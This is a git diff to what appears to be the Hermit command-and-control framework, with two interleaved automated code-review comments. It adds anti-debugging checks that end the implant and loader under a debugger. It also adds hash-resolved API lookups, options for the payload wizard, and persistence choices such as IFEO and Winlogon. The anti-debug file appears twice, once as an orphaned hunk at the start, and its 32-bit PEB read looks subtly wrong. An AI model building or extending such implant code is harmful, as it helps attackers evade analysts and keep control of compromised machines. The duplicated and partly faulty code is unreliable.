@@ -0,0 +1,39 @@ +#include "core/technique.hpp" + +namespace Technique::AntiDebug +{ + // Reference: + // https://evasions.checkpoint.com/src/Anti-Debug/techniques/debug-flags.html + VOID StopIfDebug(Procs::PPROCS pProcs) + { + // 1. Check with IsDebuggerPresent + if (pProcs->lpIsDebuggerPresent()) + { + ExitProcess(-1); + } + + // 2. Check with CheckRemoteDebuggerPresent + BOOL bRemoteDebuggerPresent; + if (pProcs->lpCheckRemoteDebuggerPresent( + NtCurrentProcess(), + &bRemoteDebuggerPresent + ) && bRemoteDebuggerPresent) + { + ExitProcess(-1); + } + + // 3. Check with NtGlobalFlag + #ifdef _WIN64 + PPEB pPeb = (PPEB)__readgsqword(0x60); + DWORD dwNtGlobalFlag = *(PDWORD)((PBYTE)pPeb + 0xBC); + #else + PPEB pPeb = (PPEB)__readgsqword(0x30); + DWORD dwNtGlobalFlag = *(PDWORD)((PBYTE)pPeb + 0x68); + #endif + + if (dwNtGlobalFlag & NT_GLOBAL_FLAG_DEBUGGED) + { + ExitProcess(-1); + } + } +} \ No newline at end of file diff --git a/payload/win/implant/src/hermit.cpp b/payload/win/implant/src/hermit.cpp index caf10e0..b5d243d 100644 --- a/payload/win/implant/src/hermit.cpp +++ b/payload/win/implant/src/hermit.cpp @@ -7,6 +7,7 @@ namespace Hermit INT nCmdShow, LPCWSTR lpPayloadType, BOOL bIndirectSyscalls, + BOOL bAntiDebug, LPCWSTR lpProtocol, LPCWSTR lpHost, INTERNET_PORT nPort, @@ -69,6 +70,12 @@ namespace Hermit // pState->pSocket = NULL; pState->bQuit = FALSE; + // Anti-Debug + if (bAntiDebug) + { + Technique::AntiDebug::StopIfDebug(pState->pProcs); + } + // Get system information std::wstring wInfoJson = Handler::GetInitialInfoJSON(pState); @@ -88,10 +95,14 @@ namespace Hermit Utils::Random::RandomSleep(pState->nSleep, pState->nJitter); if (Handler::IsKillDateReached(pState->nKillDate)) + { pState->bQuit = TRUE; + } if (Handler::CheckIn(pState, wInfoJson)) + { break; + } } while (1 == 1); // Tasks 
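Review bot: `StopIfDebug` in the new anti_debug.cpp has no comment stating its contract, which matters because all three checks end the process silently through `ExitProcess(-1)`. I would add above the function `// Exits the process if IsDebuggerPresent, CheckRemoteDebuggerPresent or the PEB NtGlobalFlag heap-check bits indicate a debugger; called in hermit.cpp when bAntiDebug is TRUE.` and a short comment that `0xBC` / `0x68` are the NtGlobalFlag offsets in the 64-bit / 32-bit PEB, since the bare literals are otherwise unexplained. `BOOL bRemoteDebuggerPresent;` is read only after a successful call because of the `&&`, but `BOOL bRemoteDebuggerPresent = FALSE;` removes the reliance on evaluation order. For anyone analysing a build, an immediate exit with code 0xFFFFFFFF (the `-1` converted to `UINT`) under a debugger is this function at work rather than a crash.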
@@ -100,7 +111,9 @@ namespace Hermit Utils::Random::RandomSleep(pState->nSleep, pState->nJitter); if (Handler::IsKillDateReached(pState->nKillDate)) + { pState->bQuit = TRUE; + } Handler::Task(pState); diff --git a/payload/win/implant/src/main/beacon_dll.cpp b/payload/win/implant/src/main/beacon_dll.cpp index 105701a..1653eb4 100644 --- a/payload/win/implant/src/main/beacon_dll.cpp +++ b/payload/win/implant/src/main/beacon_dll.cpp @@ -17,6 +17,11 @@ DWORD WINAPI ThreadProc(LPVOID lpParam) #else FALSE, #endif + #ifdef PAYLOAD_ANTI_DEBUG + TRUE, + #else + FALSE, + #endif LISTENER_PROTOCOL_W, LISTENER_HOST_W, (INTERNET_PORT)LISTENER_PORT, diff --git a/payload/win/implant/src/main/beacon_exe.cpp b/payload/win/implant/src/main/beacon_exe.cpp index d7d1cf3..2502702 100644 --- a/payload/win/implant/src/main/beacon_exe.cpp +++ b/payload/win/implant/src/main/beacon_exe.cpp @@ -11,6 +11,11 @@ INT WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine #else FALSE, #endif + #ifdef PAYLOAD_ANTI_DEBUG + TRUE, + #else + FALSE, + #endif LISTENER_PROTOCOL_W, LISTENER_HOST_W, (INTERNET_PORT)LISTENER_PORT, diff --git a/payload/win/loader/CMakeLists.txt b/payload/win/loader/CMakeLists.txt index deb8aab..1fffc8e 100644 --- a/payload/win/loader/CMakeLists.txt +++ b/payload/win/loader/CMakeLists.txt @@ -35,6 +35,9 @@ add_compile_definitions(AES_IV_BASE64=${AES_IV_BASE64}) if(${PAYLOAD_INDIRECT_SYSCALLS} STREQUAL "true") add_compile_definitions(PAYLOAD_INDIRECT_SYSCALLS=${PAYLOAD_INDIRECT_SYSCALLS}) endif() +if(${PAYLOAD_ANTI_DEBUG} STREQUAL "true") + add_compile_definitions(PAYLOAD_ANTI_DEBUG=${PAYLOAD_ANTI_DEBUG}) +endif() if(${PAYLOAD_FORMAT} STREQUAL "bin") add_compile_definitions(IS_SHELLCODE=1) endif() 
@@ -49,9 +52,6 @@ set(SOURCE_CORE src/hermit.cpp src/core/crypt.cpp src/core/procs.cpp - src/core/technique/injection/dll_injection.cpp - src/core/technique/injection/pe_injection.cpp - src/core/technique/injection/shellcode_injection.cpp src/core/handler.cpp src/core/state.cpp src/core/stdout.cpp @@ -62,6 +62,10 @@ set(SOURCE_CORE src/core/system/handle.cpp src/core/system/http.cpp src/core/system/process.cpp + src/core/technique/anti_debug.cpp + src/core/technique/injection/dll_injection.cpp + src/core/technique/injection/pe_injection.cpp + src/core/technique/injection/shellcode_injection.cpp src/core/utils/convert.cpp ) if(${PAYLOAD_TYPE} STREQUAL \"dll-loader\") diff --git a/payload/win/loader/include/core/procs.hpp b/payload/win/loader/include/core/procs.hpp index cb66ebe..ca3d700 100644 --- a/payload/win/loader/include/core/procs.hpp +++ b/payload/win/loader/include/core/procs.hpp @@ -49,7 +49,9 @@ #define APIHASH_RTLSTRINGCCHCOPYW 0x32231e60 #define APIHASH_RTLSTRINGCCHLENGTHW 0x28821d8f #define APIHASH_RTLZEROMEMORY 0x899c0d1e +#define APIHASH_CHECKREMOTEDEBUGGERPRESENT 0x478dd921 #define APIHASH_CREATETHREADPOOLWAIT 0x7a8370ac +#define APIHASH_ISDEBUGGERPRESENT 0xef4ed1b #define APIHASH_SETTHREADPOOLWAIT 0x5f2a3808 #define APIHASH_WINHTTPCLOSEHANDLE 0x22081731 #define APIHASH_WINHTTPCONNECT 0xe18b30db @@ -151,8 +153,12 @@ namespace Procs typedef VOID (NTAPI* LPPROC_RTLZEROMEMORY)(PVOID Destination, SIZE_T Length); // **WINAPIs** + // CheckRemoteDebuggerPresent + typedef BOOL (WINAPI* LPPROC_CHECKREMOTEDEBUGGERPRESENT)(HANDLE hProcess, PBOOL pbDebuggerPresent); // CreateThreadpoolWait typedef PTP_WAIT (WINAPI* LPPROC_CREATETHREADPOOLWAIT)(PTP_WAIT_CALLBACK pfnwa, PVOID pv, PTP_CALLBACK_ENVIRON pcbe); + // IsDebuggerPresent + typedef BOOL (WINAPI* LPPROC_ISDEBUGGERPRESENT)(); // SetThreadpoolWait typedef VOID (WINAPI* LPPROC_SETTHREADPOOLWAIT)(PTP_WAIT pwa, HANDLE h, PFILETIME pftTimeout); // WinHttpCloseHandle 
@@ -222,7 +228,9 @@ namespace Procs LPPROC_RTLZEROMEMORY lpRtlZeroMemory = nullptr; // **WINAPI** + LPPROC_CHECKREMOTEDEBUGGERPRESENT lpCheckRemoteDebuggerPresent = nullptr; LPPROC_CREATETHREADPOOLWAIT lpCreateThreadpoolWait = nullptr; + LPPROC_ISDEBUGGERPRESENT lpIsDebuggerPresent = nullptr; LPPROC_SETTHREADPOOLWAIT lpSetThreadpoolWait = nullptr; LPPROC_WINHTTPCLOSEHANDLE lpWinHttpCloseHandle = nullptr; LPPROC_WINHTTPCONNECT lpWinHttpConnect = nullptr; diff --git a/payload/win/loader/include/core/technique.hpp b/payload/win/loader/include/core/technique.hpp index c9dd355..9bf6646 100644 --- a/payload/win/loader/include/core/technique.hpp +++ b/payload/win/loader/include/core/technique.hpp @@ -21,6 +21,17 @@ typedef BOOL (WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID); #define DEREF_16(name)*(WORD *)(name) #define DEREF_8(name)*(BYTE *)(name) +// Used for Anti-Debug +#define FLG_HEAP_ENABLE_TAIL_CHECK 0x10 +#define FLG_HEAP_ENABLE_FREE_CHECK 0x20 +#define FLG_HEAP_VALIDATE_PARAMETERS 0x40 +#define NT_GLOBAL_FLAG_DEBUGGED (FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS) + +namespace Technique::AntiDebug +{ + VOID StopIfDebug(Procs::PPROCS pProcs); +} + namespace Technique::Injection::Helper { DWORD Rva2Offset( diff --git a/payload/win/loader/script/calc_api_hash.py b/payload/win/loader/script/calc_api_hash.py index 0699378..95ad77f 100644 --- a/payload/win/loader/script/calc_api_hash.py +++ b/payload/win/loader/script/calc_api_hash.py @@ -43,7 +43,9 @@ "RtlZeroMemory", # WINAPI + "CheckRemoteDebuggerPresent", "CreateThreadpoolWait", + "IsDebuggerPresent", "SetThreadpoolWait", "WinHttpCloseHandle", "WinHttpConnect", diff --git a/payload/win/loader/src/core/procs.cpp b/payload/win/loader/src/core/procs.cpp index 9692346..2931fb3 100644 --- a/payload/win/loader/src/core/procs.cpp +++ b/payload/win/loader/src/core/procs.cpp 
@@ -132,32 +132,36 @@ namespace Procs pProcs->lpRtlZeroMemory = reinterpret_cast(pRtlZeroMemory); // WINAPI - PVOID pCreateThreadpoolWait = GetProcAddressByHash(hKernel32DLL, APIHASH_CREATETHREADPOOLWAIT); - pProcs->lpCreateThreadpoolWait = reinterpret_cast(pCreateThreadpoolWait); - PVOID pSetThreadpoolWait = GetProcAddressByHash(hKernel32DLL, APIHASH_SETTHREADPOOLWAIT); - pProcs->lpSetThreadpoolWait = reinterpret_cast(pSetThreadpoolWait); - PVOID pWinHttpCloseHandle = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPCLOSEHANDLE); - pProcs->lpWinHttpCloseHandle = reinterpret_cast(pWinHttpCloseHandle); - PVOID pWinHttpConnect = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPCONNECT); - pProcs->lpWinHttpConnect = reinterpret_cast(pWinHttpConnect); - PVOID pWinHttpOpen = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPOPEN); - pProcs->lpWinHttpOpen = reinterpret_cast(pWinHttpOpen); - PVOID pWinHttpOpenRequest = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPOPENREQUEST); - pProcs->lpWinHttpOpenRequest = reinterpret_cast(pWinHttpOpenRequest); - PVOID pWinHttpQueryDataAvailable = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPQUERYDATAAVAILABLE); - pProcs->lpWinHttpQueryDataAvailable = reinterpret_cast(pWinHttpQueryDataAvailable); - PVOID pWinHttpQueryHeaders = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPQUERYHEADERS); - pProcs->lpWinHttpQueryHeaders = reinterpret_cast(pWinHttpQueryHeaders); - PVOID pWinHttpReadData = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPREADDATA); - pProcs->lpWinHttpReadData = reinterpret_cast(pWinHttpReadData); - PVOID pWinHttpReceiveResponse = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPRECEIVERESPONSE); - pProcs->lpWinHttpReceiveResponse = reinterpret_cast(pWinHttpReceiveResponse); - PVOID pWinHttpSendRequest = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPSENDREQUEST); - pProcs->lpWinHttpSendRequest = reinterpret_cast(pWinHttpSendRequest); - PVOID pWinHttpSetOption = GetProcAddressByHash(hWinHTTPDLL, 
APIHASH_WINHTTPSETOPTION); - pProcs->lpWinHttpSetOption = reinterpret_cast(pWinHttpSetOption); - PVOID pWinHttpWriteData = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPWRITEDATA); - pProcs->lpWinHttpWriteData = reinterpret_cast(pWinHttpWriteData); + PVOID pCheckRemoteDebuggerPresent = GetProcAddressByHash(hKernel32DLL, APIHASH_CHECKREMOTEDEBUGGERPRESENT); + pProcs->lpCheckRemoteDebuggerPresent = reinterpret_cast(pCheckRemoteDebuggerPresent); + PVOID pCreateThreadpoolWait = GetProcAddressByHash(hKernel32DLL, APIHASH_CREATETHREADPOOLWAIT); + pProcs->lpCreateThreadpoolWait = reinterpret_cast(pCreateThreadpoolWait); + PVOID pIsDebuggerPresent = GetProcAddressByHash(hKernel32DLL, APIHASH_ISDEBUGGERPRESENT); + pProcs->lpIsDebuggerPresent = reinterpret_cast(pIsDebuggerPresent); + PVOID pSetThreadpoolWait = GetProcAddressByHash(hKernel32DLL, APIHASH_SETTHREADPOOLWAIT); + pProcs->lpSetThreadpoolWait = reinterpret_cast(pSetThreadpoolWait); + PVOID pWinHttpCloseHandle = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPCLOSEHANDLE); + pProcs->lpWinHttpCloseHandle = reinterpret_cast(pWinHttpCloseHandle); + PVOID pWinHttpConnect = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPCONNECT); + pProcs->lpWinHttpConnect = reinterpret_cast(pWinHttpConnect); + PVOID pWinHttpOpen = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPOPEN); + pProcs->lpWinHttpOpen = reinterpret_cast(pWinHttpOpen); + PVOID pWinHttpOpenRequest = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPOPENREQUEST); + pProcs->lpWinHttpOpenRequest = reinterpret_cast(pWinHttpOpenRequest); + PVOID pWinHttpQueryDataAvailable = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPQUERYDATAAVAILABLE); + pProcs->lpWinHttpQueryDataAvailable = reinterpret_cast(pWinHttpQueryDataAvailable); + PVOID pWinHttpQueryHeaders = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPQUERYHEADERS); + pProcs->lpWinHttpQueryHeaders = reinterpret_cast(pWinHttpQueryHeaders); + PVOID pWinHttpReadData = GetProcAddressByHash(hWinHTTPDLL, 
APIHASH_WINHTTPREADDATA); + pProcs->lpWinHttpReadData = reinterpret_cast(pWinHttpReadData); + PVOID pWinHttpReceiveResponse = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPRECEIVERESPONSE); + pProcs->lpWinHttpReceiveResponse = reinterpret_cast(pWinHttpReceiveResponse); + PVOID pWinHttpSendRequest = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPSENDREQUEST); + pProcs->lpWinHttpSendRequest = reinterpret_cast(pWinHttpSendRequest); + PVOID pWinHttpSetOption = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPSETOPTION); + pProcs->lpWinHttpSetOption = reinterpret_cast(pWinHttpSetOption); + PVOID pWinHttpWriteData = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPWRITEDATA); + pProcs->lpWinHttpWriteData = reinterpret_cast(pWinHttpWriteData); if (bIndirectSyscall) { diff --git a/payload/win/loader/src/core/technique/anti_debug.cpp b/payload/win/loader/src/core/technique/anti_debug.cpp new file mode 100644 index 0000000..d40c7dc --- /dev/null +++ b/payload/win/loader/src/core/technique/anti_debug.cpp @@ -0,0 +1,39 @@ +#include "core/technique.hpp" + +namespace Technique::AntiDebug +{ + // Reference: + // https://evasions.checkpoint.com/src/Anti-Debug/techniques/debug-flags.html + VOID StopIfDebug(Procs::PPROCS pProcs) + { + // 1. Check with IsDebuggerPresent + if (pProcs->lpIsDebuggerPresent()) + { + ExitProcess(-1); + } + + // 2. Check with CheckRemoteDebuggerPresent + BOOL bRemoteDebuggerPresent; + if (pProcs->lpCheckRemoteDebuggerPresent( + NtCurrentProcess(), + &bRemoteDebuggerPresent + ) && bRemoteDebuggerPresent) + { + ExitProcess(-1); + } + + // 3. Check with NtGlobalFlag + #ifdef _WIN64 + PPEB pPeb = (PPEB)__readgsqword(0x60); + DWORD dwNtGlobalFlag = *(PDWORD)((PBYTE)pPeb + 0xBC); + #else + PPEB pPeb = (PPEB)__readgsqword(0x30); + DWORD dwNtGlobalFlag = *(PDWORD)((PBYTE)pPeb + 0x68); + #endif + + if (dwNtGlobalFlag & NT_GLOBAL_FLAG_DEBUGGED) + { + ExitProcess(-1); + } + } +} \ No newline at end of file 
diff --git a/payload/win/loader/src/hermit.cpp b/payload/win/loader/src/hermit.cpp index 9519875..ab22313 100644 --- a/payload/win/loader/src/hermit.cpp +++ b/payload/win/loader/src/hermit.cpp @@ -93,10 +93,17 @@ namespace Hermit } VOID DLLLoader() - { + { State::PSTATE pState = Init(); if (!pState) + { return; + } + + // Anti-Debug + #ifdef PAYLOAD_ANTI_DEBUG + Technique::AntiDebug::StopIfDebug(pState->pProcs); + #endif // Download DLL std::vector bytes = Download(pState); @@ -127,7 +134,14 @@ namespace Hermit { State::PSTATE pState = Init(); if (!pState) + { return; + } + + // Anti-Debug + #ifdef PAYLOAD_ANTI_DEBUG + Technique::AntiDebug::StopIfDebug(pState->pProcs); + #endif // Download PE std::vector bytes = Download(pState); @@ -156,10 +170,17 @@ namespace Hermit } VOID ShellcodeLoader() - { + { State::PSTATE pState = Init(); if (!pState) + { return; + } + + // Anti-Debug + #ifdef PAYLOAD_ANTI_DEBUG + Technique::AntiDebug::StopIfDebug(pState->pProcs); + #endif // Download shellcode std::vector bytes = Download(pState); diff --git a/pkg/client/rpc/request.go b/pkg/client/rpc/request.go index f426198..c7d4567 100644 --- a/pkg/client/rpc/request.go +++ b/pkg/client/rpc/request.go @@ -212,6 +212,7 @@ func RequestPayloadImplantGenerate(clientState *state.ClientState, imp *payload. Jitter: int64(imp.Jitter), KillDate: int64(imp.KillDate), IndirectSyscalls: imp.IndirectSyscalls, + AntiDebug: imp.AntiDebug, }) if err != nil { return []byte{}, err @@ -230,6 +231,7 @@ func RequestPayloadLoaderGenerate(clientState *state.ClientState, ldr *payload.L Technique: ldr.Technique, ProcessToInject: ldr.ProcessToInject, IndirectSyscalls: ldr.IndirectSyscalls, + AntiDebug: ldr.AntiDebug, }) if err != nil { return []byte{}, err diff --git a/pkg/common/parser/amtaskcommand.go b/pkg/common/parser/amtaskcommand.go index 918ea10..830b4c6 100644 --- a/pkg/common/parser/amtaskcommand.go +++ b/pkg/common/parser/amtaskcommand.go 
@@ -595,10 +595,14 @@ func (c *amTaskPersistCmd) Run( // Select the technique items := []string{ "runkey", + "user-init-mpr-logon-script", "screensaver", - // "registry/netsh", + "default-file-extension-hijacking", + "ifeo", + // "netsh", // "schedule", // "service", + "winlogon", "(cancel)", } res, err := stdin.Select("Technique", items) diff --git a/pkg/common/wizard/payload.go b/pkg/common/wizard/payload.go index 00202ef..b13c283 100644 --- a/pkg/common/wizard/payload.go +++ b/pkg/common/wizard/payload.go @@ -307,6 +307,17 @@ func WizardPayloadImplant( break } + var oAntiDebug bool = false + for { + yes, err := stdin.Confirm("Enable Anti-Debug?") + if err != nil { + stdout.LogFailed(fmt.Sprint(err)) + continue + } + oAntiDebug = yes + break + } + table := []stdout.SingleTableItem{ stdout.NewSingleTableItem("Type", oType), stdout.NewSingleTableItem("Target OS", oOs), @@ -317,6 +328,7 @@ func WizardPayloadImplant( stdout.NewSingleTableItem("Jitter", fmt.Sprint(oJitter)), stdout.NewSingleTableItem("KillDate (UTC)", oKillDateStr), stdout.NewSingleTableItem("Indirect Syscalls", fmt.Sprintf("%t", oIndirectSyscalls)), + stdout.NewSingleTableItem("Anti-Debug", fmt.Sprintf("%t", oAntiDebug)), } stdout.PrintSingleTable("Implant Options", table) @@ -346,6 +358,7 @@ func WizardPayloadImplant( oJitter, oKillDate, oIndirectSyscalls, + oAntiDebug, ), nil } @@ -441,6 +454,17 @@ func WizardPayloadLoader( break } + var oAntiDebug bool = false + for { + yes, err := stdin.Confirm("Enable Anti-Debug?") + if err != nil { + stdout.LogFailed(fmt.Sprint(err)) + continue + } + oAntiDebug = yes + break + } + table := []stdout.SingleTableItem{ stdout.NewSingleTableItem("Target OS", oOs), stdout.NewSingleTableItem("Target Arch", oArch), 
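Review bot: The `Enable Anti-Debug?` loop added to WizardPayloadImplant in pkg/common/wizard/payload.go has no exit on failure, because every error from `stdin.Confirm` is logged and followed by `continue`. If Confirm keeps failing, for example on a closed or non-interactive stdin (inferred, since its implementation is not in the hunk), the wizard spins and logs indefinitely. Returning the error to the caller or capping the retries would bound it, and the identical loop added to WizardPayloadLoader in the `@@ -441,6 +454,17 @@` hunk needs the same treatment. As a style point, `var oAntiDebug bool = false` can be written `var oAntiDebug bool`, since the zero value is already false. Both functions start and end outside these hunks, so the earlier prompts may follow the same pattern.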
@@ -450,6 +474,7 @@ func WizardPayloadLoader( stdout.NewSingleTableItem("Injection Technique", oTechnique), stdout.NewSingleTableItem("Target Process", oProcessToInject), stdout.NewSingleTableItem("Indirect Syscalls", fmt.Sprintf("%t", oIndirectSyscalls)), + stdout.NewSingleTableItem("Anti-Debug", fmt.Sprintf("%t", oAntiDebug)), } stdout.PrintSingleTable("Loader Options", table) @@ -480,6 +505,7 @@ func WizardPayloadLoader( oTechnique, oProcessToInject, oIndirectSyscalls, + oAntiDebug, ), nil } diff --git a/pkg/protobuf/rpcpb/rpc.pb.go b/pkg/protobuf/rpcpb/rpc.pb.go index 2d09037..d29ad21 100644 --- a/pkg/protobuf/rpcpb/rpc.pb.go +++ b/pkg/protobuf/rpcpb/rpc.pb.go @@ -269,6 +269,7 @@ type PayloadImplant struct { Jitter int64 `protobuf:"varint,12,opt,name=jitter,proto3" json:"jitter,omitempty"` KillDate int64 `protobuf:"varint,13,opt,name=killDate,proto3" json:"killDate,omitempty"` IndirectSyscalls bool `protobuf:"varint,14,opt,name=indirectSyscalls,proto3" json:"indirectSyscalls,omitempty"` + AntiDebug bool `protobuf:"varint,15,opt,name=antiDebug,proto3" json:"antiDebug,omitempty"` } func (x *PayloadImplant) Reset() { @@ -401,6 +402,13 @@ func (x *PayloadImplant) GetIndirectSyscalls() bool { return false } +func (x *PayloadImplant) GetAntiDebug() bool { + if x != nil { + return x.AntiDebug + } + return false +} + type PayloadLoader struct { state protoimpl.MessageState sizeCache protoimpl.SizeCache @@ -419,6 +427,7 @@ type PayloadLoader struct { Technique string `protobuf:"bytes,11,opt,name=technique,proto3" json:"technique,omitempty"` ProcessToInject string `protobuf:"bytes,12,opt,name=processToInject,proto3" json:"processToInject,omitempty"` IndirectSyscalls bool `protobuf:"varint,13,opt,name=indirectSyscalls,proto3" json:"indirectSyscalls,omitempty"` + AntiDebug bool `protobuf:"varint,14,opt,name=antiDebug,proto3" json:"antiDebug,omitempty"` } func (x *PayloadLoader) Reset() { 
@@ -544,6 +553,13 @@ func (x *PayloadLoader) GetIndirectSyscalls() bool { return false } +func (x *PayloadLoader) GetAntiDebug() bool { + if x != nil { + return x.AntiDebug + } + return false +} + type PayloadShellcode struct { state protoimpl.MessageState sizeCache protoimpl.SizeCache @@ -967,7 +983,7 @@ var file_rpcpb_rpc_proto_rawDesc = []byte{ 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x20, 0x0a, 0x0b, 0x70, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4e, 0x61, 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x70, 0x61, - 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0xd8, 0x02, 0x0a, 0x0e, 0x50, 0x61, + 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0xf6, 0x02, 0x0a, 0x0e, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x49, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x75, 0x75, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x75, 0x75, 0x69, 0x64, 
@@ -989,175 +1005,179 @@ var file_rpcpb_rpc_proto_rawDesc = []byte{ 0x6b, 0x69, 0x6c, 0x6c, 0x44, 0x61, 0x74, 0x65, 0x12, 0x2a, 0x0a, 0x10, 0x69, 0x6e, 0x64, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x79, 0x73, 0x63, 0x61, 0x6c, 0x6c, 0x73, 0x18, 0x0e, 0x20, 0x01, 0x28, 0x08, 0x52, 0x10, 0x69, 0x6e, 0x64, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x79, 0x73, 0x63, - 0x61, 0x6c, 0x6c, 0x73, 0x22, 0xd5, 0x02, 0x0a, 0x0d, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, - 0x4c, 0x6f, 0x61, 0x64, 0x65, 0x72, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, - 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x75, 0x75, 0x69, 0x64, 0x18, 0x02, - 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x75, 0x75, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, - 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x0e, - 0x0a, 0x02, 0x6f, 0x73, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x02, 0x6f, 0x73, 0x12, 0x12, - 0x0a, 0x04, 0x61, 0x72, 0x63, 0x68, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x61, 0x72, - 0x63, 0x68, 0x12, 0x16, 0x0a, 0x06, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x18, 0x06, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x06, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x12, 0x1c, 0x0a, 0x09, 0x6c, 0x70, - 0x72, 0x6f, 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x18, 0x07, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x6c, - 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x12, 0x14, 0x0a, 0x05, 0x6c, 0x68, 0x6f, 0x73, - 0x74, 0x18, 0x08, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x12, 0x14, - 0x0a, 0x05, 0x6c, 0x70, 0x6f, 0x72, 0x74, 0x18, 0x09, 0x20, 0x01, 0x28, 0x05, 0x52, 0x05, 0x6c, - 0x70, 0x6f, 0x72, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x74, 0x79, 0x70, 0x65, 0x18, 0x0a, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x04, 0x74, 0x79, 0x70, 0x65, 0x12, 0x1c, 0x0a, 0x09, 0x74, 0x65, 0x63, 0x68, - 0x6e, 0x69, 0x71, 0x75, 0x65, 0x18, 0x0b, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x74, 0x65, 0x63, - 0x68, 0x6e, 0x69, 0x71, 0x75, 0x65, 0x12, 0x28, 0x0a, 0x0f, 0x70, 0x72, 
0x6f, 0x63, 0x65, 0x73, - 0x73, 0x54, 0x6f, 0x49, 0x6e, 0x6a, 0x65, 0x63, 0x74, 0x18, 0x0c, 0x20, 0x01, 0x28, 0x09, 0x52, - 0x0f, 0x70, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x54, 0x6f, 0x49, 0x6e, 0x6a, 0x65, 0x63, 0x74, - 0x12, 0x2a, 0x0a, 0x10, 0x69, 0x6e, 0x64, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x79, 0x73, 0x63, - 0x61, 0x6c, 0x6c, 0x73, 0x18, 0x0d, 0x20, 0x01, 0x28, 0x08, 0x52, 0x10, 0x69, 0x6e, 0x64, 0x69, - 0x72, 0x65, 0x63, 0x74, 0x53, 0x79, 0x73, 0x63, 0x61, 0x6c, 0x6c, 0x73, 0x22, 0x80, 0x02, 0x0a, - 0x10, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, - 0x65, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, - 0x64, 0x12, 0x12, 0x0a, 0x04, 0x75, 0x75, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, - 0x04, 0x75, 0x75, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, - 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x0e, 0x0a, 0x02, 0x6f, 0x73, 0x18, - 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x02, 0x6f, 0x73, 0x12, 0x12, 0x0a, 0x04, 0x61, 0x72, 0x63, - 0x68, 